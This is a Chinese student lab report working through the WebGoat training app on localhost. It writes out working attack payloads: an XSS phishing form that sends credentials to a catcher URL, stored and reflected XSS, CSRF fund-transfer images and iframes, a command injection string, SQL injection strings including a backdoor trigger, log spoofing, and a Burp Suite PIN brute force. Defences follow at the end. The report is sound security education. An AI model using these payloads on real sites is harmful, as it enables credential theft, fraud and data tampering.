20155232《网络对抗》Exp9 Web安全基础
本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。
实验过程
WebGoat
Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;
OWASP(Open Web Application Security Project)是一个非营利的组织,它的目的是帮助个人和企业来发现和使用可信赖的软件。
- WebGoat分为简单版和开发板,简单版是个Java的Jar包,只需要有Java环境即可,我们在命令行里执行:
java -jar webgoat-container-7.0.1-war-exec.jar
运行WebGoat:
- WebGoat使用8080端口,所以在浏览器上访问
注意W G大写。
localhost:8080/WebGoat
进入WebGoat之后,可以看到有很多题目来让我们进行练习:
Cross-Site Scripting练习
Phishing with XSS
这是跨站脚本钓鱼攻击,要求在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点
创建一个form,让受害人在创建的form中填写用户名和密码,再添加一段javascript代码,读取受害人输入的用户名和密码,并且将这些信息发送给http://localhost:8080/WebGoat/catcher?PROPERTY=yes...,
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert(".....your information was stolen by lsq! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>please input your information here:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
- 输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你:
- 攻击成功~~~。。。。。:
Stored XSS Attacks
-
储存型XSS攻击:XSS攻击代码存储于数据库中,每次当用户打开此网页时便会执行,危害大,常用语留言板,每次当用户查看留言信息时即触发。导致用户访问时载入非预期的页面或内容
-
在title里随便输入某些内容
-
然后在message中输入一串代码,比如:
<script>alert(" you have been attacked by lsq !!");</script>
- 当用户在论坛中点击刚刚创建的帖子后:
- 成功进行了攻击:
Reflected XSS Attacks
- 存储型XSS与反射型XSS有什么区别?
存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。
反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。
- 这里练习的具体解释:
在服务器端验证所有输入始终是一个很好的做法。当在HTTP响应中使用未经验证的用户输入时,可能发生XSS。在一个反射的XSS攻击中,攻击者可以用攻击脚本制作URL并将其张贴到另一个网站上,发送电子邮件,或者以其他方式让受害者点击它。
-
当我们输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展示给我们看:
-
这时如果我们将带有攻击性的URL作为输入源,例如依旧输入
<script>alert(" you have been attacked by lsq !!!");</script>
,就会弹出对话框:
Cross Site Request Forgery(CSRF)
这里练习的目标是发送电子邮件到新闻组。电子邮件包含一个图像,其URL指向恶意请求。在本课中,URL应该指向“攻击”Servlet,该课程的“屏幕”和“菜单”参数和一个额外的参数“TrimeFund”具有任意数值,如5000。您可以通过在右边插入的参数中找到“屏幕”和“菜单”值来构建链接。当时被认证的CSRF邮件的收件人将转移他们的资金。当这一课的攻击成功时,左边的菜单旁边出现一个绿色的复选标记。
-
以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。
-
我们在message框中输入这样一串代码
<img src=\'attack?Screen=277&menu=900&transferFunds=5000\' width=\'1\' height=\'1\'>
注意这里面的Screen和menu的值每个人的电脑可能不一样,可以在当前页面的右边有个Parameters进行查看,然后通过宽高设置成1像素,隐藏掉这个图片。
- 提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。
CSRF Prompt By-Pass
目标是向包含多个恶意请求的新闻组发送电子邮件:第一个转移资金,第二个请求确认第一个请求被触发的提示。URL应该指向这个CSRF提示的攻击servlet,通过PASS课程的屏幕、菜单参数和一个额外的参数“TrimeBoover”,它具有一个数字值,比如“5000”来启动一个传输,一个字符串值“确认”完成它。您可以从右边的插图复制该课程的参数,创建“攻击”格式的URL。屏幕= xxx和菜单= yyy和转移资金= ZZZ”。无论谁收到这封电子邮件,恰巧在那时被认证,他的资金将被转移。当您认为攻击成功时,刷新页面,您将在左侧菜单中找到绿色检查
-
查看页面右边Parameters中的src和menu值。
-
在message中添加代码:
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>
- 提交后生成一个链接,点击:
或者!
- 在浏览器中手动输入URL
localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=5000
进入确认转账请求页面:
- 点击CONFIRM按钮之后,再在浏览器中输入URL:
localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=CONFIRM
成功转走了5000元:
Injection Flaws练习
SQL注入攻击对任何数据库驱动的站点都构成严重威胁。攻击背后的方法很容易学习,造成的损害可以从相当大到完全的系统妥协。尽管存在这些风险,但互联网上令人难以置信的系统数量易受这种攻击形式的影响。
对所有输入数据进行清理,尤其是在OS命令、脚本和数据库查询中使用的数据,以某种其他方式阻止SQL注入的威胁,也是很好的做法。
Command Injection
- 在目标主机上执行系统命令,通过火狐浏览器下的Firebug对源代码进行修改,在BackDoors.help旁边加上
"& netstat -an & ipconfig"
-
之后在下拉菜单中能看到我们修改后的值:
-
选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:
Numeric SQL Injection
-
题目要求:
下面的表单允许用户查看天气数据。尝试注入导致所有天气数据显示的SQL字符串。
现在,您已经成功执行SQL注入,尝试对参数化查询进行相同类型的攻击。 -
加上一个1=1这种永真式即可达到我们的目的,依旧利用firebug,在任意一个值比如101旁边加上or 1=1:
- 选中Columbia,点Go,出现:
Log Spoofing
- 我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”,在User Name文本框中输入
lsq%0d%0aLogin Succeeded for username: admin
其中%0d是回车,%0a是换行符:
- 如图所示,攻击成功:
String SQL Injection
- 这里和之前一样,基于select语句构造SQL注入字符串,在文本框中输入
\' or 1=1 --
第一个分号用来闭合last_name的第一个分号,而第二个分号用来闭合last_name的第二个分号。将一条语句被强行拆分成为两条语句。
- 点Go,攻击成功,所有用户信息都被显示出来:
LAB:SQL Injection(Stage 1:String SQL Injection)
- 以用户larry登录,在密码栏中输入
\' or 1=1 --
进行SQL注入,但是登录失败:
-
查看网页代码后发现这里设定的长度不够。然后进行修改:
-
成功哈:
SQL Injection(Stage 3:Numeric SQL Injection)
-
跟之前是一样的方法,然后点击ViewProfile可以浏览员工信息:
-
使用inspect分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,我们要达到通过Larry来浏览老板账户信息的目的,一般来说老板的工资都应该是最高的,所以把其中的value值改为
101 or 1=1 order by salary desc --
这里desc是指工资按降序排序,这样老板的信息就会被排到第一个。
- 之后就可以查看到老板的信息:
Database Backdoors
- 先输一个101,得到了该用户的信息:
- 输入注入语句:
101; update employee set salary=90000
成功把该用户的工资涨到了90000:
- 然后使用语句
101;CREATE TRIGGER lsqBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=\'20155232@qq.com\' WHERE userid = NEW.userid
Blind Numeric SQL Injection
- 我们的目标是找到pins表中cc_number字段值为1111222233334444的记录中pin字段的数值,从服务端页面返回的信息中可以知道,它只告诉你两种信息:帐号有效或无效,我们可以先输入语句
101 AND ((SELECT pin FROM pins WHERE cc_number=\'1111222233334444\') > 10000 );
查看pin数值是否大于10000
-
后来确定在2000到2500之间,然后打开BurpSuite。
-
设置:
-
启动BurpSuite
-
设置代理“Proxy”的“Options”选项
默认是8080端口被占用时需要添加一个新的端口5232,点击add -
添加后勾选,如图所示
-
设置浏览器的代理
-
打开浏览器右侧的“更多”选项卡,找到preference-advanced-settings
当于将burpsuite当成中间服务器,每个数据包都流过它。设置好之后回到题目,任意选择一项,点击GO,然后回到burpsuite。发现多了捕获的包:
-
在Positions中,选择Sniper模式,然后用光标选中需要暴力穷举的变量,在此处是account_number后的值,然后点击右侧的add添加(在此之前点击clear清空所有的)
-
在Payloads中,选择type类型为number,然后设置变化范围2000-2500,并设置步长为1
- 在Options中,选择Start attack开始攻击
在这里找到数据包大小变化的位置2364,用2364试一下:
在关闭了burpsuite之后,把浏览器的代理调回不使用代理,否则浏览器上不了网
实验后回答问题
(1)SQL注入攻击原理,如何防御
SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。
1、 普通用户与系统管理员用户的权限要有严格的区分。
2、 强迫使用参数化语句。
3、 加强对用户输入的验证。
4、使用SQL Server数据库自带的安全参数。
5、使用正则表达式过滤传入的参数,对一些包含sql注入的关键字进行过滤。
6、jsp中调用该函数检查是否包含非法字符,防止SQL从URL注入。
(2)XSS攻击的原理,如何防御
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器
执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列
表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等。
1、在表单提交或者url参数传递前,对需要的参数进行过滤。
2、过滤用户输入的检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。严格控制输出
(3)CSRF攻击原理,如何防御
跨站请求伪造,盗用身份发送恶意请求。
1、验证 HTTP Referer 字段
2、在请求地址中添加 token 并验证
3、在 HTTP 头中自定义属性并验证
实验总结与体会
这次实验很有意思,题目中会结合一些实际的例子,进行攻击。也学习到了很多攻击类型,更加深入的了解很多。在使用BurpSuite捕获包进行源码修改的方法时,遇到了很多问题,这个软件都是英文版本,所以用起来真的很费劲,看了很多学长学姐的博客,才慢慢拼凑起来,慢慢学会使用。另一种方法直接使用Firebug修改网页源码,要更容易一些,但是可用范围就要小了一些了。